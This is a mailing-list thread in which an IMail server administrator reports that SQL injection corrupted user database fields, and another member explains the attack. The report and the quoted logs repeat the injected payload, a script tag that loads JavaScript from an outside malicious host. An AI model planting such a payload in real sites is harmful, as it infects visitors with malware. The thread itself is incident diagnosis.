Oops, I misread this.
You were hacked using SQL injection from the Web side of things. I'm
not sure what interface was hit, but it could be that webmail is
vulnerable to this. There's a bunch on SANS about these attacks:
http://www.google.com/search?sourceid=mozclient&ie=utf-8&oe=utf-8&q=sql+injection+site%3Aisc%2Esans%2Eorg
My guess is that this is Storm Botnet originated stuff. They hack sites
through a very common coding vulnerability in database connected
websites, insert redirection code to an infected site, and when
unsuspecting users visit the intended site, they get infected by means
of one of many vulnerabilities in desktop apps that they target.
Your logs are showing the aftermath of having the bad data in there.
This will continue to happen over and over again until you patch
whatever is vulnerable. You either have some sort of custom site set up
that has access to this particular database, or it was hacked straight
through IMail's Web interfaces. I would love to know which one.
Matt
Kevin Rogers wrote:
Thanks Matt. I use an external SQL Server for Imail and all my users
had their USERDIR and MAILADDR and TIMEZONE fields changed to include
that coldwop.com javascript (e.g., "someuser" had their USERDIR set to
"d:\imail\someuser<script src=http://www.coldwop.com/b.js></script>")
I've fixed that. So what you're saying is that you don't think any
passwords have been compromised, but I've just been hit by the SQL
injector attacker?
Matt wrote:
This looks exactly like the SQL injection attacker from recent months
is trying to exploit a Postfix flaw by injecting into IMAP
interfaces. If this is causing you problems, it would seem that
IMail then isn't properly handling this bad data resulting in a
denial of service, though I strongly suspect that you are not
vulnerable otherwise. It could also be simply curious timing with
two different issues.
Matt
Kevin Rogers wrote:
Today our web mail application stopped working. Some users are
reporting IMAP issues as well. I've restarted all the services and
rebooted, but that hasn't helped. The error when entering web mail
is that there is an "illegal character in the path". When I checked
the syslog, I found thousands of entries like this:
06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\main.mbx)
Coldwop.com apparently is a malicious site (my Trend Micro won't
even let me go there). Have I been hacked by them?
Anyone seen this?
I'm running Imail 9.23 on Windows Server 2003, all patches.
Thanks for your help.
Kevin
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
